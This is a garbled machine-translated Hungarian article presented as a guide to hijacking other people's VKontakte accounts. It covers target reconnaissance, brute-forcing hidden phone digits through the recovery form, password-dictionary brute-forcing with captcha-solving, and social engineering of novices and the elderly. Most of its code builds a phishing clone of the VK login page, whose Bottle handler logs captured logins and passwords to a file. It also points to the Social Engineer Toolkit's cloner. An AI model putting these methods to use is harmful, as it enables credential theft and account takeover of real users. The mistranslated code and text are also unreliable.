Készpénzben bízunk a fekete bevételi tervekben - hogyan kell feltörni a vkontakte-t
Hogyan kell becsapni egy VKontakte-t?
Egyszerű válasz - egyáltalán nem! Teljes egészében - ha úgy gondolja, hogy a legtöbb felhasználó hibázik, akkor a hackelés lehetséges, de ne tévessze össze a koncepciót.
Az olyan biztonsági rés, amely lehetővé teszi, hogy öt másodpercen belül teljesen kihasználhassa a felhasználót, nem és nem lesz. És ha igen, senki sem fog ajánlani neked. Ezért az alábbiakban bemutatott módszerek egyik vagy másik módon a felhasználó csalására és az agy hiányára való használatra irányulnak.
Az egész folyamatot több szakaszba osztjuk. Kezdetben szükségünk van egy célra, szabad időre, biztonságos hozzáférésre a VC-hez.
Információgyűjtés
Ebben a szakaszban van egy felhasználói oldalunk, amelyet kívánatos lenne feltörni, és a lehető legtöbb hasznos információt kell összegyűjteni, ami később segíthet a sikeres hackelésben.
Mi van az oldalon?
Kiválasztjuk, és arra kényszerítjük a felhasználót, hogy összekapcsolja a mobiltelefont a szolgáltatással. Most már nem csak két számjegye van. Ahhoz, hogy megismerkedh velük, csak a már használatos helyreállítási űrlapot kell rendeznie. Csak 99-szer. Automatizálható is. És amikor megkérdezi az oldal nevét, hogyan adhat védelmet, egyszerűen beírjuk. Végtére is ismerjük a céloldalt.
Továbbá, bizonyos esetekben, az emberek szeretnek kiadni a szám az oldalon, de zárja számának része, csillagokkal, kötőjelet és így tovább. D. Ha szerencséd van, akkor fel kell tárni, hogy pontosan a számok, hogy nem áll rendelkezésre formájában helyreállítása a VC.
1) Szociális védelem. Azt kell mondanom, ez a módszer alkalmas bármilyen iskolában egyáltalán, vagy fordítva, az idősek, akik keveset tudnak az interneten, de úgy döntöttünk, hogy bármilyen okból zaregatsya sots.seti. Ha csak gyakorolni akarsz, akkor kezdők találhatók
itt.
Alapvetően egy egyszerű mechanizmust használnak itt. Az a személy, aki nem ért meg valamit, tudat alatt bízik a tapasztaltabb felhasználók / adminisztrátorok / technikai támogatásban, és magáévá teszi a szavakat.
Ebben a módszerben mindez attól függ, hogy Ön képes-e szivattyúzni készségeit minden újonnan érkezett VC-re, majd áttérni többé-kevésbé közönséges felhasználókra.
Neki szükségünk van, tiszteletben tartják csak a felhasználói szótárunkat. Ezt nem lehet bárhová bevinni, ezért saját magunkat csináljuk. Mi van? Példa (a karakter fiktív).
Van egy VK oldala is. amelyen megírják, milyen jelszavakat kell feltüntetni, milyen szimbólumok lehetségesek és a leggyakoribb jelszavak.
Kiderült egy 14 soros lap. De ettől még szükség van a jelszavak kombinációjára, amelyet a szűklátókörű felhasználó hozhat létre.
Az alábbiakban egy kis pithon script, amely ezt teszi.
14, 1272 verzióból származtatott.
De mi a teendő? Ne üljön és kézzel haladjon át minden jelszóban.
Természetesen mindent többé-kevésbé automatizálni kell.
Ebből a célból van egy parancsfájl, amely a Vk mobil verzióján keresztül ugrik.
Egyetlen cél, proxy és többszöveg nélkül. De ő maga is beléphet a hiányzó alakok közé a másik ország hívásából. Az anti-meleg személy segítségével is könnyen belép a captcha-ba, amely egy 5-6-os próbálkozás után jelenik meg az egyik ip-ről.
3) Mindenünk hamis. Ez a módszer figyelmetlen emberek számára készült. A legtöbb esetben egy vagy több ingyenes levél vonz, vagy több figyelmet fordít. Az alábbiakban egy egyszerű hamisítványt hozhat létre egy közös webhely wk (bejelentkezési oldal) alapján. A mobil verziót és az alapváltozatot is figyelembe veheti attól függően, hogy a felhasználó melyik eszközről kíván bejelentkezni. Ami a regisztrálást illeti egy hasonló domain hosting és vásárlásával kapcsolatban, nem írok semmit, mert egyszerűen triviális.
Először töltsd le a bejelentkezési oldalt a böngésződben. Ezután módosítsa a html fájl kódolását utf-8-ra.
Először definiáljuk a kódolást
file --mime-encoding file.html
Ezután az eredetiről az újra váltunk
iconv -f iso-8859-1 -t utf-8 fájl.html> vk2.html
Ezután létre kell hoznia egy oldalkezelést a kiszolgáló nyelvén. Ehhez használhatja a pythonot. Használhatja a legegyszerűbb keretet az úgynevezett palack. Ez egy plusz, mivel nincs szüksége függőségekre. Csak töltsd le a szkript fájlt a webhelyről, és ez az.
@route ('/')
def index ():
visszatérési sablon ('vk2.html')
@route ('/ Üdvözöljük! | VK_files /')
def server_static (fájl elérési útvonala):
return static_file (fájlpálya, root = '. / Üdvözöljük! | VK_files /')
A parancsfájl tesztfuttatása után egyes fájlok 404-es hibát találtak.
Sajnos nincsenek megfelelő képek a webhelyről. Helyezzük el őket egy külön kép mappába.
Írjunk egy új útvonalat a forgatókönyvbe.
@route ('/ images /
def server_static (fájl elérési útvonala):
return static_file (fájlpálya, root = '. / images /')
Most minden nagyobb nagyságrendű lett. Akkor persze, ami akkor megy, és töltse le a főoldalon a fő Nem vagy bejelentkezve, hogy ez hihető (majd módosítsa a linkeket a fő), de egy is elég.
Mi hiányzik? Ó igen, természetesen. A bejelentkezés után semmi sem történik. Változtassuk meg.
Adja meg az utólagos kérés útválasztását. Keresse meg a bejelentkezési űrlapot az oldalon. Módosítsa cselekvési kódját üresen, és távolítsa el az onsubmit ellenőrzést. És adjuk hozzá a kérés utáni feldolgozást.
@post ('/')
def index ():
login = request.forms.get ('email')
password = request.forms.get ('pass')
print "| Catch | --------------" + login + ':' + jelszó
nyitott ("log.txt", "a") mint myfile:
myfile.write (login + ':' + jelszó + "\ n")
Így működik. Az igazság csak a gomb megnyomásával érhető el, de nem egy gombnyomással.
A formanyomtatvány alatt lévő gombcímkét a formanyomtatványok határain belül adjuk hozzá, és hozzáadjuk a tulajdonságt = "submit".
Ezután a gomb működik, ahogy kellene. Archívum a kész döntés mellett.
Ha kész megoldást szeretne használni, használhatja a SET gombot. Social Engineer Toolkit. Ez szerepel a kálium disztromában. A kiszolgálón normál debianra telepíthető a kali reps segítségével vagy az összes függőséget külön-külön beállítva.
Használja a webhely klónozó funkcióját a készletben. További funkciói vannak, például a rosszindulatú parancsfájlok közvetlen beágyazása az oldalba, vagy veszélyes vaku hozzáadása.
különben azt gondoltam, hogy:
1. a dalodat éneklik
A feleség megváltoztatja a kampányt, létrehozva egy bal oldali dobozt (********* @ bk.ru). Hogyan lehet égetni?